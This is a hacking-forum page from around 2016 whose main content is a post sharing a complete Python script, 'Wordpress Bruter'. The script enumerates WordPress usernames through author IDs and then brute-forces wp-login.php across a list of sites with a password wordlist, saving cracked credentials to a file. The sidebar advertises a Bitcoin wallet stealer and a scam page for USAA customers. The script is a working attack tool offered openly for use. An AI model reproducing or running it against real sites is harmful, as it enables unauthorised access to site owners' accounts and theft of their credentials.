www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» BitCoin Wallet stealor New
Yesterday at 7:46 pm by Admin

» Muhammad Shahroze Rashid | Marketing Consultant
Yesterday at 1:48 pm by Admin

» Muhammad Shahroze Rashid | Sharp Mind, Sharp Innovations
Yesterday at 1:47 pm by Admin

» How to design an effective job ad
Yesterday at 1:45 pm by Admin

» Teen Patti Gold Hack & 3 Patti Chips Code Extra Bonus 2016
Tue Dec 06, 2016 4:38 am by shoytan er lara

» Content Marketing | Promotional Video
Fri Dec 02, 2016 2:45 pm by Admin

» How to start an Online Business | Complete Guide
Fri Dec 02, 2016 2:30 pm by Admin

» Zeeshan Bhatti
Wed Nov 30, 2016 3:18 pm by Admin

» USAA letter for scam page
Tue Nov 29, 2016 4:20 am by Hardyjsh1966

December 2016

MonTueWedThuFriSatSun
   1234
567891011
12131415161718
19202122232425
262728293031 

Calendar Calendar

Affiliates


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter


Flag Counter

About Author

Muhammad Shahroze Rashid
i4info
Web Developer
Web Developer & Designer,Researcher and Technical writer. An Information Security Consultant and System Auditor, a keen Security researcher.
samanabad
lahore, Punjab
54000
Pakistan
[email protected]
03064904829
DOB: 05/25/1992
Muhammad Shahroze Rashid
Muhammad Shahroze Rashid is a Web Developer and Designer, Android Developer, InfoGrapher, IT consultant and Researcher
Reviewed by Google
Google
Date published: 01/19/2016
9 / 10 stars
Muhammad Shahroze Rashid
Muhammad Shahroze Rashid Web Developer & Designer,Researcher and Technical writer. An Information Security Consultant and System Audito
samanabad
lahore
Punjab
54000
Pakistan

Wordpress Bruter [Python]

Share

Admin
Admin

Posts : 455
Reputation : 5
Join date : 2014-12-10
Age : 24
Location : Pakistan

Wordpress Bruter [Python]

Post by Admin on Mon Jun 06, 2016 11:23 am

Code:
#!/usr/bin/python # >>>>>>>>> bismallah <<<<<<<<<< ''' this a wordpress bruter the special thing about it that it grabs user and brute force it ''' # v1.0 first release import sys , re , urllib2 , urllib , cookielib , os from platform import system if system() == 'Linux': os.system('clear') if system() == 'Windows': os.system('cls') logo = ''' _ ______ __ __ | | / / __ \/ /_ _______ __/ /____ | ----| Wordpress Bruter |---- | | /| / / /_/ / __ \/ ___/ / / / __/ _ \ | Author : | |/ |/ / ____/ /_/ / / / /_/ / /_/ __/ | FB : |__/|__/_/ /_.___/_/ \__,_/\__/\___/ | Blog : ''' print(logo) # this function is to enumerate user def user(site , passlist): userlist = list() i = 1 # you can edit to whatever number of users you want to enumerate while( i <= 5 ) : url = site + '?author=%i' % i try: data = urllib2.urlopen(url).read() # cleaning the sh*t re1 = re.findall("<title>(.*?)</title>" , data) user = re.search("(.*?) |" , re1[0]).group(1) userlist.append(user) except: pass i += 1 wpbrute(site , userlist, passlist) return site def wpbrute(site , userlist , passlist): for user in userlist: # if enumeration returns no user if user == "" : userlist[0] = "admin" del userlist[1:] for user in userlist : for password in passlist: try: print str(site) + ':' + user + ':' + password # found the answer on stackoverflow cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) login_data = urllib.urlencode({'log' : user, 'pwd' : password}) opener.open(str(site) + 'wp-login.php', login_data) resp = opener.open(str(site)+'wp-admin') final = resp.read() if '<li id="wp-admin-bar-logout">' in final: print "\n\t[*] Cracked : " + str(site) + ':' + user + ':' + password + '\n' with open('wpcracked.txt' , 'a') as myfile: myfile.write('~~ Cracked ~~ ' + str(site) + ':' + user + ':' + password + '\n') break except: pass try: siteslist = list() passlist = list() wpfile = sys.argv[1] wordlist = sys.argv[2] # opening sites file sites = open(wpfile).readlines() # opening password files   passes = open(wordlist).readlines() # passes to list for pass1 in passes: pass1 = pass1.rstrip() passlist.append(pass1) # sites to list for site in sites: site = site.rstrip() if 'http://' not in site: site = 'http://' + site if '/' != site[-1]: site = site + '/' user(site , passlist) except IndexError: print "[*] Usage : python "+sys.argv[0]+" wp.txt wordlist.txt"

    Current date/time is Thu Dec 08, 2016 10:52 am